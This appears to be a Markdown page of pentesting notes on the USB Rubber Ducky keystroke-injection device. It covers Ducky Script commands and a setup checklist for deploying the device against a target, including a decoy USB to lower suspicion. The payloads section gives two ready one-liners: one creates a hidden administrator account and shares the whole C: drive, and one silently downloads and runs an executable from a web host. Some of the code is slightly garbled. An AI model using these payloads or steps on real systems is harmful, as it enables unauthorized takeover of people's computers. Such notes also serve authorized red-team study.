# RubberDucky Docs

## Usage <a id="usage"></a>

### Use case <a id="use-case"></a>

> This is used for Keystroke injection attacks

### Details <a id="details"></a>

![](../.gitbook/assets/4_35611eac-0b76-4cdb-a716-b37665b26bd9_1024x1024-600x600.jpg)

* SD Card: FAT filesystem, MAX 2 GB
* Button:
  * Press once to replay the payload
  * hold while inserting for firmware flashing mode
* Supported connections:
  * USB C
  * PS/2
  * ... \(if you have an adaptor it will work\)

### Setup <a id="setup"></a>

1. Do OSINT
2. Find a target
3. Research the OS and check for an internet connection
4. Look for a script template or create your own
5. Keep system speed and keyboard layout in mind
6. Encode using Duck Encoder
7. TEST the RubberDucky, perferably on a similar VM
8. Deploy
9. Have a backup RubberDucky with another script in case the other doesn't work
10. Have an identical harmless USB to lower suspicion

## Ducky Script <a id="ducky-script"></a>

### REM <a id="rem"></a>

> used for comments

```text
REM This is a comment
```

### DEFAULTDELAY OR DEFAULT\_DELAY <a id="defaultdelay-or-default_delay"></a>

> placed at the beginning of the script, defines the default delay in miliseconds \* 10

```text
DEFAULTDELAY 100
```

### DELAY <a id="delay"></a>

> induce a delay inbetween 1-10.000 msecs \(\*10\)

```text
DELAY 10
```

### STRING <a id="string"></a>

> types the following text

```text
STRING type this on a keyboard!
```

### WINDOWS OR GUI <a id="windows-or-gui"></a>

> press the super-key

```text
GUI r
```

### MENU OR APP <a id="menu-or-app"></a>

> open the context-menu \(similar to rightclick\)

```text
MENU
```

### SHIFT <a id="shift"></a>

> simulate a shift keypress, can have arguments: DELETE, HOME, INSERT, PAGEUP, PAGEDOWN, WINDOWS, GUI, UPARROW, LEFTARROW, RIGHTARROW, TAB

```text
SHIFT DELETE
```

### ALT <a id="alt"></a>

> similar to SHIFT, can have arguments: END, ESC, ESCAPE, F1..F12, Single char, SPACE, TAB

```text
ALT f
```

### CONTROL OR CTRL <a id="control-or-ctrl"></a>

> more of the same, can have arguments: BREAK, PAUSE, F1..F12, ESCAPE, ESC, Single char

```text
CTRL ESCAPE
```

### DOWNARROW OR DOWN \| RIGHTARROW OR RIGHT \| LEFTARROW OR LEFT \| UPARROW OR UP <a id="downarrow-or-down-or-rightarrow-or-right-or-leftarrow-or-left-or-uparrow-or-up"></a>

> guess what... it presses the arrow

```text
UP
```

### More keys <a id="more-keys"></a>

> BREAK OR PAUSE, CAPSLOCK, DELETE, END, ESC OR ESCAPE, HOME, INSERT, NUMLOCK, PAGEUP, PAGEDOWN, PRINTSCREEN, SCROLLOCK, SPACE, TAB

## Use-case - no internet <a id="use-case-no-internet"></a>

Take a usb dongle, plugin the rubber ducky and a mass storage device. now you can just plugin the dongle and use a command to copy the output to the mass storage.

## Payloads <a id="payloads"></a>

> ​[https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads](https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads)​
>
> ​[https://ducktoolkit.com](https://ducktoolkit.com/)​
>
> More on page 31-34 of the manual.

### A one-liner to add user "ts" \(password "ts"\) to the admin group and share the C Drive <a id="a-one-liner-to-add-user-ts-password-ts-to-the-admin-group-and-share-the-c-drive"></a>

```text
DELAY 1000GUI rDELAY 100STRING powershell -Exec Bypass "saps cmd `/C net User ts ts /ADD&net LocalGroup Administrators ts /ADD&netsh advfirewall firewall set rule group="""File and Printer Sharing""" new enable=Yes&net share ts=c:\ /UNLIMITED&icalcs c:\* /grant ts:(OI)(CI)F` -Verb RunAs"ENTERDELAY 1000ALT y
```

### An example stage payload. This one-liner will download and execute a file hosted online. <a id="an-example-stage-payload-this-one-liner-will-download-adn-execute-a-file-hosted-online"></a>

```text
DELAY 1000GUI rDELAY 200STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient),DownloadFile('http://example.com/calc.txt',\"$env:temp\calc.exe\"); Start-Process \"$env:temp\calc.exe\""ENTER
```

### More samples and obfuscation <a id="more-samples-and-obfuscation"></a>

> Page 34-END of the included guide



